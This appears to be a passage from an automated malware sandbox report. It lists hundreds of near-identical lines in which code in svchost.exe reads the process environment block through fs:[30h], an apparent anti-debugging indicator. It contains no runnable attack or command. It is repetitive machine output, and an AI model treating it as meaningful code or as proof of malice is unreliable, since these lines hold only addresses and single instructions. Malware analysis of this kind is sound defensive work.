            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A2C3 mov eax, dword ptr fs:[00000030h]1_2_0343A2C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035062D6 mov eax, dword ptr fs:[00000030h]1_2_035062D6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402E1 mov eax, dword ptr fs:[00000030h]1_2_034402E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]1_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0346E284 mov eax, dword ptr fs:[00000030h]1_2_0346E284
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B0283 mov eax, dword ptr fs:[00000030h]1_2_034B0283
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034402A0 mov eax, dword ptr fs:[00000030h]1_2_034402A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov ecx, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C62A0 mov eax, dword ptr fs:[00000030h]1_2_034C62A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov ecx, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C4144 mov eax, dword ptr fs:[00000030h]1_2_034C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0342C156 mov eax, dword ptr fs:[00000030h]1_2_0342C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C8158 mov eax, dword ptr fs:[00000030h]1_2_034C8158
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03436154 mov eax, dword ptr fs:[00000030h]1_2_03436154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03504164 mov eax, dword ptr fs:[00000030h]1_2_03504164
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov eax, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DE10E mov ecx, dword ptr fs:[00000030h]1_2_034DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov ecx, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034DA118 mov eax, dword ptr fs:[00000030h]1_2_034DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F0115 mov eax, dword ptr fs:[00000030h]1_2_034F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03460124 mov eax, dword ptr fs:[00000030h]1_2_03460124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034F61C3 mov eax, dword ptr fs:[00000030h]1_2_034F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034AE1D0 mov eax, dword ptr fs:[00000030h]1_2_034AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035061E5 mov eax, dword ptr fs:[00000030h]1_2_035061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034601F8 mov eax, dword ptr fs:[00000030h]1_2_034601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03470185 mov eax, dword ptr fs:[00000030h]1_2_03470185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034EC188 mov eax, dword ptr fs:[00000030h]1_2_034EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034D4180 mov eax, dword ptr fs:[00000030h]1_2_034D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B019F mov eax, dword ptr fs:[00000030h]1_2_034B019F
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342A197 mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03432050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B6050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0345C073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B4000 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034D2000 mov eax, dword ptr fs:[00000030h] (x8)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0344E016 mov eax, dword ptr fs:[00000030h] (x4)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342A020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342C020 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034C6030 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B20DE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034380E9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B60E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342C0F0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034720F0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0343208A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034280A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034C80A8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034F60B8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034F60B8 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346674D mov esi, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346674D mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03430750 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034BE75D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03472750 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B4755 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03438770 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03440770 mov eax, dword ptr fs:[00000030h] (x12)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346C700 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03430710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03460710 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346C720 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346273C mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346273C mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034AC730 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0343C7C0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B07C3 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034527ED mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034BE7E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034347FB mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034D678E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034307AF mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034E47A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0344C640 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034F866E mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346A660 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03462674 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034AE609 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0344260B mov eax, dword ptr fs:[00000030h] (x7)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03472619 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0344E627 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03466620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03468620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0343262C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346A6C7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034AE6F2 mov eax, dword ptr fs:[00000030h] (x4)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B06F1 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03434690 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346C6A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034666B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03438550 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346656A mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034C6500 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03504500 mov eax, dword ptr fs:[00000030h] (x7)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03440535 mov eax, dword ptr fs:[00000030h] (x6)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0345E53E mov eax, dword ptr fs:[00000030h] (x5)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346E5CF mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034365D0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346A5D0 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0345E5E7 mov eax, dword ptr fs:[00000030h] (x8)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034325E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346C5ED mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03432582 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03432582 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03464588 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346E59C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B05A7 mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034545B1 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346E443 mov eax, dword ptr fs:[00000030h] (x8)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034EA456 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342645D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0345245A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034BC460 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0345A470 mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342E420 mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342C427 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B6420 mov eax, dword ptr fs:[00000030h] (x7)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034304E5 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034EA49A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034364AB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034644B0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034BA4B0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034E4B4B mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03502B57 mov eax, dword ptr fs:[00000030h] (x4)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034C6B40 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034FAB40 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034D8B42 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03428B50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034DEB50 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0342CB7E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03504B00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034AEB1D mov eax, dword ptr fs:[00000030h] (x9)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0345EB20 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034F8B28 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03450BCB mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03430BCD mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034DEBD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03438BF0 mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0345EBFC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034BCBF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03440BBE mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034E4BB0 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03436A50 mov eax, dword ptr fs:[00000030h] (x7)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03440A5B mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346CA6F mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034DEA60 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034ACA72 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034BCA11 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346CA24 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0345EA2E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03454A35 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03486ACC mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03430AD0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03464AD0 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0346AAEE mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0343EA80 mov eax, dword ptr fs:[00000030h] (x9)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03504A80 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03468A90 mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03438AA0 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03486AA4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B0946 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03504940 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03456962 mov eax, dword ptr fs:[00000030h] (x3)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0347096E mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_0347096E mov edx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034D4978 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034BC97C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034AE908 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034BC912 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03428918 mov eax, dword ptr fs:[00000030h] (x2)
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034B892A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_034C892B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034C69C0 mov eax, dword ptr fs:[00000030h]1_2_034C69C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0343A9D0 mov eax, dword ptr fs:[00000030h]1_2_0343A9D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034649D0 mov eax, dword ptr fs:[00000030h]1_2_034649D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034FA9D3 mov eax, dword ptr fs:[00000030h]1_2_034FA9D3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034BE9E0 mov eax, dword ptr fs:[00000030h]1_2_034BE9E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]1_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034629F9 mov eax, dword ptr fs:[00000030h]1_2_034629F9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034429A0 mov eax, dword ptr fs:[00000030h]1_2_034429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]1_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034309AD mov eax, dword ptr fs:[00000030h]1_2_034309AD
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov esi, dword ptr fs:[00000030h]1_2_034B89B3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_034B89B3 mov eax, dword ptr fs:[00000030h]1_2_034B89B3
